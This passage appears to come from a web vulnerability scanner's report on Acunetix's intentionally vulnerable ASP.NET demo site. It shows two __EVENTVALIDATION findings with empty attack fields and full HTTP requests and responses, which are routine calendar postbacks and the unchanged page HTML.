style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8344&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBArq7AvtoIZGRksCBMdKZA0e0Rr7Tee7%2BMHo3HytE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK1hJ%2FACwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA5yqtfEiH3tFi1%2FZb0%2B5eO7jHKLb
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:53 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBArq7AvtoIZGRksCBMdKZA0e0Rr7Tee7+MHo3HytE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK1hJ/ACwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA5yqtfEiH3tFi1/Zb0+5eO7jHKLb" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:White" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8314&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDASbYtp9oIZGRk9U74yk6rS4M8S8LigElhJJTanO0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2pMywDALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gI3Cro%2Fot1HmbVo9mIsmXAD0Jg60g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:49 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDASbYtp9oIZGRk9U74yk6rS4M8S8LigElhJJTanO0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2pMywDALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gI3Cro/ot1HmbVo9mIsmXAD0Jg60g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:White" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" 